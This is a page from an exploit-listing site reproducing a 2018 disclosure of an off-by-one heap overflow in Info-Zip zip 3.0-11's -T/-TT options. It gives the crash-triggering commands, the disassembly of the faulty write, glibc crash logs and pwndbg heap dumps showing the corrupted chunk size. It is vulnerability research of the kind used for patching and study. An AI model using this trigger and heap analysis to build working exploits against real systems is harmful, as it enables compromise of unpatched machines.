Advertisement






Info-Zip Zip 3.0-11 Crash

CVE Category Price Severity
CVE-2018-9834 CWE-119 $5000 High
Author Risk Exploitation Type Date
Unknown High Local 2018-07-09
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H 0.04421 0.74601

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018070091

Below is a copy:

Info-Zip Zip 3.0-11 Crash
Hello,

I found info-zip's zip command's crash.
This vulnerability is occured by off by one.
I don't use the malformed file for crash. just command.

And if 'zip' binary is added to function, it can be exploitable vulnerability I think.

[ Environment ]

OS : Ubuntu 16.04.3 LTS
Kernel : Linux ubuntu 4.4.0-127-generic #153-Ubuntu SMP Sat May 19 10:58:46 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
info-zip zip : 3.0-11

[ Condition ]

* using option -T, -TT
* Vulnerability is occured by off by one.
: linux command execution using option -T, -TT
: To execute the command used in the -T and -TT options, it is stored in the heap before the system, and the data to be stored is parsed as follows.
: 0x18 => zip flagT.zip -T -TT 'AAAAAAAAAAAA' => AAAAAAAAAAAA 'flagT.zip'
: 0x38 => zip flagT.zip -T -TT 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' => AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 'flagT.zip'
: 0x58 => zip flagT.zip -T -TT 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 'flagT.zip'
: When an instruction is stored in the heap, it is occured by off by one.
: It happens in the code below.
Disassembly -
.text:000000000040A052                 mov     rax, [rsp+48h+var_40]
.text:000000000040A057                 mov     word ptr [r15+rax+2], 27h
Hexray -
*(_WORD *)&v7[v16 + 2] = 0x27;


[ Error Msg ]

CMD : zip flagT.zip -T -TT 'AAAAAAAAAAAA'<- die process
sh: 1: AAAAAAAAAAAA: not found
*** Error in `zip': free(): invalid next size (fast): 0x00000000009ef350 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7f47300237e5]
/lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7f473002c37a]
/lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7f473003053c]
zip[0x409f25]
zip[0x4079ef]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7f472ffcc830]
zip[0x408529]
======= Memory map: ========
00400000-0042c000 r-xp 00000000 08:01 2229966                            /usr/bin/zip
0062c000-0062d000 r--p 0002c000 08:01 2229966                            /usr/bin/zip
0062d000-0062f000 rw-p 0002d000 08:01 2229966                            /usr/bin/zip
0062f000-0067e000 rw-p 00000000 00:00 0
009ee000-00a0f000 rw-p 00000000 00:00 0                                  [heap]
7f4728000000-7f4728021000 rw-p 00000000 00:00 0
7f4728021000-7f472c000000 ---p 00000000 00:00 0
7f472fabe000-7f472fad4000 r-xp 00000000 08:01 3937284                    /lib/x86_64-linux-gnu/libgcc_s.so.1
7f472fad4000-7f472fcd3000 ---p 00016000 08:01 3937284                    /lib/x86_64-linux-gnu/libgcc_s.so.1
7f472fcd3000-7f472fcd4000 rw-p 00015000 08:01 3937284                    /lib/x86_64-linux-gnu/libgcc_s.so.1
7f472fcd4000-7f472ffac000 r--p 00000000 08:01 2229713                    /usr/lib/locale/locale-archive
7f472ffac000-7f473016c000 r-xp 00000000 08:01 3952945                    /lib/x86_64-linux-gnu/libc-2.23.so
7f473016c000-7f473036c000 ---p 001c0000 08:01 3952945                    /lib/x86_64-linux-gnu/libc-2.23.so
7f473036c000-7f4730370000 r--p 001c0000 08:01 3952945                    /lib/x86_64-linux-gnu/libc-2.23.so
7f4730370000-7f4730372000 rw-p 001c4000 08:01 3952945                    /lib/x86_64-linux-gnu/libc-2.23.so
7f4730372000-7f4730376000 rw-p 00000000 00:00 0
7f4730376000-7f4730385000 r-xp 00000000 08:01 3937245                    /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7f4730385000-7f4730584000 ---p 0000f000 08:01 3937245                    /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7f4730584000-7f4730585000 r--p 0000e000 08:01 3937245                    /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7f4730585000-7f4730586000 rw-p 0000f000 08:01 3937245                    /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7f4730586000-7f47305ac000 r-xp 00000000 08:01 3952943                    /lib/x86_64-linux-gnu/ld-2.23.so
7f4730786000-7f473078a000 rw-p 00000000 00:00 0
7f47307aa000-7f47307ab000 rw-p 00000000 00:00 0
7f47307ab000-7f47307ac000 r--p 00025000 08:01 3952943                    /lib/x86_64-linux-gnu/ld-2.23.so
7f47307ac000-7f47307ad000 rw-p 00026000 08:01 3952943                    /lib/x86_64-linux-gnu/ld-2.23.so
7f47307ad000-7f47307ae000 rw-p 00000000 00:00 0
7ffc94323000-7ffc94344000 rw-p 00000000 00:00 0                          [stack]
7ffc9439b000-7ffc9439e000 r--p 00000000 00:00 0                          [vvar]
7ffc9439e000-7ffc943a0000 r-xp 00000000 00:00 0                          [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  [vsyscall]


zip error: Interrupted (aborting)
*** Error in `zip': free(): invalid pointer: 0x00000000009ef370 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7f47300237e5]
/lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7f473002c37a]
/lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7f473003053c]
zip[0x40873e]
zip[0x4090cb]
zip[0x409279]
/lib/x86_64-linux-gnu/libc.so.6(+0x354b0)[0x7f472ffe14b0]
/lib/x86_64-linux-gnu/libc.so.6(gsignal+0x38)[0x7f472ffe1428]
/lib/x86_64-linux-gnu/libc.so.6(abort+0x16a)[0x7f472ffe302a]
/lib/x86_64-linux-gnu/libc.so.6(+0x777ea)[0x7f47300237ea]
/lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7f473002c37a]
/lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7f473003053c]
zip[0x409f25]
zip[0x4079ef]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7f472ffcc830]
zip[0x408529]
======= Memory map: ========
00400000-0042c000 r-xp 00000000 08:01 2229966                            /usr/bin/zip
0062c000-0062d000 r--p 0002c000 08:01 2229966                            /usr/bin/zip
0062d000-0062f000 rw-p 0002d000 08:01 2229966                            /usr/bin/zip
0062f000-0067e000 rw-p 00000000 00:00 0
009ee000-00a0f000 rw-p 00000000 00:00 0                                  [heap]
7f4728000000-7f4728021000 rw-p 00000000 00:00 0
7f4728021000-7f472c000000 ---p 00000000 00:00 0
7f472fabe000-7f472fad4000 r-xp 00000000 08:01 3937284                    /lib/x86_64-linux-gnu/libgcc_s.so.1
7f472fad4000-7f472fcd3000 ---p 00016000 08:01 3937284                    /lib/x86_64-linux-gnu/libgcc_s.so.1
7f472fcd3000-7f472fcd4000 rw-p 00015000 08:01 3937284                    /lib/x86_64-linux-gnu/libgcc_s.so.1
7f472fcd4000-7f472ffac000 r--p 00000000 08:01 2229713                    /usr/lib/locale/locale-archive
7f472ffac000-7f473016c000 r-xp 00000000 08:01 3952945                    /lib/x86_64-linux-gnu/libc-2.23.so
7f473016c000-7f473036c000 ---p 001c0000 08:01 3952945                    /lib/x86_64-linux-gnu/libc-2.23.so
7f473036c000-7f4730370000 r--p 001c0000 08:01 3952945                    /lib/x86_64-linux-gnu/libc-2.23.so
7f4730370000-7f4730372000 rw-p 001c4000 08:01 3952945                    /lib/x86_64-linux-gnu/libc-2.23.so
7f4730372000-7f4730376000 rw-p 00000000 00:00 0
7f4730376000-7f4730385000 r-xp 00000000 08:01 3937245                    /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7f4730385000-7f4730584000 ---p 0000f000 08:01 3937245                    /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7f4730584000-7f4730585000 r--p 0000e000 08:01 3937245                    /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7f4730585000-7f4730586000 rw-p 0000f000 08:01 3937245                    /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7f4730586000-7f47305ac000 r-xp 00000000 08:01 3952943                    /lib/x86_64-linux-gnu/ld-2.23.so
7f4730786000-7f473078a000 rw-p 00000000 00:00 0
7f47307a9000-7f47307aa000 rw-p 00000000 00:00 0
7f47307ab000-7f47307ac000 r--p 00025000 08:01 3952943                    /lib/x86_64-linux-gnu/ld-2.23.so
7f47307ac000-7f47307ad000 rw-p 00026000 08:01 3952943                    /lib/x86_64-linux-gnu/ld-2.23.so
7f47307ad000-7f47307ae000 rw-p 00000000 00:00 0
7ffc94323000-7ffc94344000 rw-p 00000000 00:00 0                          [stack]
7ffc9439b000-7ffc9439e000 r--p 00000000 00:00 0                          [vvar]
7ffc9439e000-7ffc943a0000 r-xp 00000000 00:00 0                          [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  [vsyscall]


CMD : zip flagT.zip -T -TT 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'  <- not die process

sh: 1: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAA: not found
*** Error in `zip': corrupted size vs. prev_size: 0x0000000001702190 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7fa2c7f497e5]
/lib/x86_64-linux-gnu/libc.so.6(+0x7e913)[0x7fa2c7f50913]
/lib/x86_64-linux-gnu/libc.so.6(+0x81cde)[0x7fa2c7f53cde]
/lib/x86_64-linux-gnu/libc.so.6(__libc_malloc+0x54)[0x7fa2c7f56184]
/lib/x86_64-linux-gnu/libc.so.6(_IO_file_doallocate+0x55)[0x7fa2c7f3f1d5]
/lib/x86_64-linux-gnu/libc.so.6(_IO_doallocbuf+0x34)[0x7fa2c7f4d594]
/lib/x86_64-linux-gnu/libc.so.6(_IO_file_overflow+0x1c8)[0x7fa2c7f4c8f8]
/lib/x86_64-linux-gnu/libc.so.6(_IO_file_xsputn+0xad)[0x7fa2c7f4b28d]
/lib/x86_64-linux-gnu/libc.so.6(_IO_vfprintf+0xd1)[0x7fa2c7f1f241]
/lib/x86_64-linux-gnu/libc.so.6(__fprintf_chk+0xf9)[0x7fa2c7fe8bc9]
zip[0x40a0a4]
zip[0x4079ef]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7fa2c7ef2830]
zip[0x408529]
======= Memory map: ========
00400000-0042c000 r-xp 00000000 08:01 2229966                            /usr/bin/zip
0062c000-0062d000 r--p 0002c000 08:01 2229966                            /usr/bin/zip
0062d000-0062f000 rw-p 0002d000 08:01 2229966                            /usr/bin/zip
0062f000-0067e000 rw-p 00000000 00:00 0
01701000-01722000 rw-p 00000000 00:00 0                                  [heap]
7fa2c0000000-7fa2c0021000 rw-p 00000000 00:00 0
7fa2c0021000-7fa2c4000000 ---p 00000000 00:00 0
7fa2c79e4000-7fa2c79fa000 r-xp 00000000 08:01 3937284                    /lib/x86_64-linux-gnu/libgcc_s.so.1
7fa2c79fa000-7fa2c7bf9000 ---p 00016000 08:01 3937284                    /lib/x86_64-linux-gnu/libgcc_s.so.1
7fa2c7bf9000-7fa2c7bfa000 rw-p 00015000 08:01 3937284                    /lib/x86_64-linux-gnu/libgcc_s.so.1
7fa2c7bfa000-7fa2c7ed2000 r--p 00000000 08:01 2229713                    /usr/lib/locale/locale-archive
7fa2c7ed2000-7fa2c8092000 r-xp 00000000 08:01 3952945                    /lib/x86_64-linux-gnu/libc-2.23.so
7fa2c8092000-7fa2c8292000 ---p 001c0000 08:01 3952945                    /lib/x86_64-linux-gnu/libc-2.23.so
7fa2c8292000-7fa2c8296000 r--p 001c0000 08:01 3952945                    /lib/x86_64-linux-gnu/libc-2.23.so
7fa2c8296000-7fa2c8298000 rw-p 001c4000 08:01 3952945                    /lib/x86_64-linux-gnu/libc-2.23.so
7fa2c8298000-7fa2c829c000 rw-p 00000000 00:00 0
7fa2c829c000-7fa2c82ab000 r-xp 00000000 08:01 3937245                    /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7fa2c82ab000-7fa2c84aa000 ---p 0000f000 08:01 3937245                    /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7fa2c84aa000-7fa2c84ab000 r--p 0000e000 08:01 3937245                    /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7fa2c84ab000-7fa2c84ac000 rw-p 0000f000 08:01 3937245                    /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7fa2c84ac000-7fa2c84d2000 r-xp 00000000 08:01 3952943                    /lib/x86_64-linux-gnu/ld-2.23.so
7fa2c86ac000-7fa2c86b0000 rw-p 00000000 00:00 0
7fa2c86d0000-7fa2c86d1000 rw-p 00000000 00:00 0
7fa2c86d1000-7fa2c86d2000 r--p 00025000 08:01 3952943                    /lib/x86_64-linux-gnu/ld-2.23.so
7fa2c86d2000-7fa2c86d3000 rw-p 00026000 08:01 3952943                    /lib/x86_64-linux-gnu/ld-2.23.so
7fa2c86d3000-7fa2c86d4000 rw-p 00000000 00:00 0
7ffc0dc06000-7ffc0dc27000 rw-p 00000000 00:00 0                          [stack]
7ffc0dd37000-7ffc0dd3a000 r-np 00000000 00:00 0                          [vvar]
7ffc0dd3a000-7ffc0dd3c000 r-xp 00000000 00:00 0                          [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  [vsyscall]


zip error: Interrupted (aborting)


[ Debugging ]
set follow-fork-mode parent
b*0x0000000000409F13
b*0x0000000000409E11
r flagT.zip -T -TT 'AAAAAAAAAAAA'

* Case 1 : zip flagT.zip -T -TT 'AAAAAAAAAAAA'
: this case malloc 0x18 size.
: so, overwrite next chunk size to null. (off by one)
# Not Crash
pwndbg> x/32gx 0x67f340
0x67f340:0x00000000000002300x0000000000000020
0x67f350:0x41414141414141410x616c662720414141
0x67f360:0x002770697a2e54670x00000000000000c1 <- off by one
0x67f370:0x00000000000a031e0x000000004ce40567
0x67f380:0x0000000040a618380x0000000000000003
0x67f390:0x00000000000000030x0000001800000004
0x67f3a0:0x00000000000000000x0000000000000001
0x67f3b0:0x00000000000000000x0000000081b40000
0x67f3c0:0x000000000067f4900x0000000000000000
0x67f3d0:0x000000000067f4500x0000000000000000
0x67f3e0:0x000000000067f4300x000000000067f470
0x67f3f0:0x000000000067f4d00x0000000000000000
0x67f400:0x00000000000000000x0000000000000000
0x67f410:0x00000000000000000x0000000000000000
0x67f420:0x00000000000000000x0000000000000021
0x67f430:0x00007f0067616c660x00007ffff7bc1b78

# Crash
0x67f340:0x00000000000002300x0000000000000020
0x67f350:0x41414141414141410x6c66272041414141
0x67f360:0x2770697a2e5467610x0000000000000000 <- off by one
0x67f370:0x00000000000a031e0x000000004ce40567
0x67f380:0x0000000040a618380x0000000000000003
0x67f390:0x00000000000000030x0000001800000004
0x67f3a0:0x00000000000000000x0000000000000001
0x67f3b0:0x00000000000000000x0000000081b40000
0x67f3c0:0x000000000067f4900x0000000000000000
0x67f3d0:0x000000000067f4500x0000000000000000
0x67f3e0:0x000000000067f4300x000000000067f470
0x67f3f0:0x000000000067f4d00x0000000000000000
0x67f400:0x00000000000000000x0000000000000000
0x67f410:0x00000000000000000x0000000000000000
0x67f420:0x00000000000000000x0000000000000021
0x67f430:0x00007f0067616c660x00007ffff7bc1b78

* Case 2 :  zip flagT.zip -T -TT 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
# crash
 : before __fprintf_chk@plt <0x402330>
0x67f150:0x00000000000000000x0000000000000041
0x67f160:0x000000000067f0b00x4141414141414141
0x67f170:0x41414141414141410x4141414141414141
0x67f180:0x41414141414141410x6c66272041414141
0x67f190:0x2770697a2e546761 0x0000000000000100 <- off by one
        ^
       prev_size

# not crash
: before __fprintf_chk@plt <0x402330>
0x67f150:0x00000000000000000x0000000000000041
0x67f160:0x000000000067f0b00x4141414141414141
0x67f170:0x41414141414141410x4141414141414141
0x67f180:0x41414141414141410x616c662720414141
0x67f190:0x002770697a2e54670x00000000000001f1

: after __fprintf_chk@plt <0x402330>
0x67f150:0x00000000000000000x0000000000000251
0x67f160:0x00007ffff7bc1db80x00007ffff7bc1db8
0x67f170:0x41414141414141410x4141414141414141
0x67f180:0x41414141414141410x616c662720414141
0x67f190:0x002770697a2e54670x0000000000000211

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum